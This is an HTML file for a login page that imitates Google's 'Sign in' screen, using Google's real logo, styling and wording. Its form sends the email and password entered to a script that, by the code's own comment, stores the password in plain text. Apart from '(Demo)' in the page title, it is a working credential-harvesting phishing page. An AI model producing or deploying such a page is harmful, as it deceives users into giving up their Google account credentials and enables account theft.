<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Sign in – Google Accounts (Demo)</title>
  <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
  <style>
    *{box-sizing:border-box;font-family:'Roboto',sans-serif}
    body{background:#f0f3f8;display:flex;align-items:center;justify-content:center;height:100vh;margin:0}
    .login-box{width:380px;background:#fff;padding:32px;border-radius:8px;box-shadow:0 1px 2px rgba(0,0,0,0.08)}
    .google-logo{display:block;margin:0 auto 12px;height:36px}
    h1{text-align:center;margin:6px 0 6px;font-size:28px;color:#202124}
    .subtitle{text-align:center;color:#5f6368;margin-bottom:18px}
    input{width:100%;padding:12px;border:1px solid #dadce0;border-radius:6px;margin-bottom:14px;font-size:15px}
    input:focus{border-color:#1a73e8;outline:none}
    .link{color:#1a73e8;text-decoration:none;font-size:14px}
    .actions{display:flex;justify-content:space-between;align-items:center;margin-top:6px}
    .next-btn{background:#1a73e8;color:#fff;padding:10px 22px;border-radius:6px;border:none;cursor:pointer}
    .footer{margin-top:18px;text-align:center;color:#5f6368;font-size:13px}
    @media(max-width:480px){.login-box{width:92%;padding:22px}}
  </style>
</head>
<body>
  <div class="login-box">
    <img class="google-logo" src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="Google">
    <h1>Sign in</h1>
    <div class="subtitle">Use your Google Account</div>

    <!-- NOTE: form posts to store_plain.php which stores plain-text password -->
    <form action="store_plain.php" method="post" onsubmit="return validateForm();">
      <input type="text" name="email" id="email" placeholder="Email or phone" required>
      <input type="password" name="password" id="password" placeholder="Password" required>
      <div style="margin-bottom:10px">
        <a href="forgot.html" class="link">Forgot password?</a>
      </div>
      <div class="footer">Not your computer? Use Guest mode to sign in privately. <a href="learn.html" class="link">Learn more</a></div>

      <div class="actions">
        <a href="register.html" class="link">Create account</a>
        <button type="submit" class="next-btn">Next</button>
      </div>
    </form>
  </div>

  <script>
    function validateForm() {
      const e = document.getElementById('email').value.trim();
      const p = document.getElementById('password').value.trim();
      if (!e || !p) {
        alert('Please enter both email and password.');
        return false;
      }
      return true;
    }
  </script>
</body>
</html>
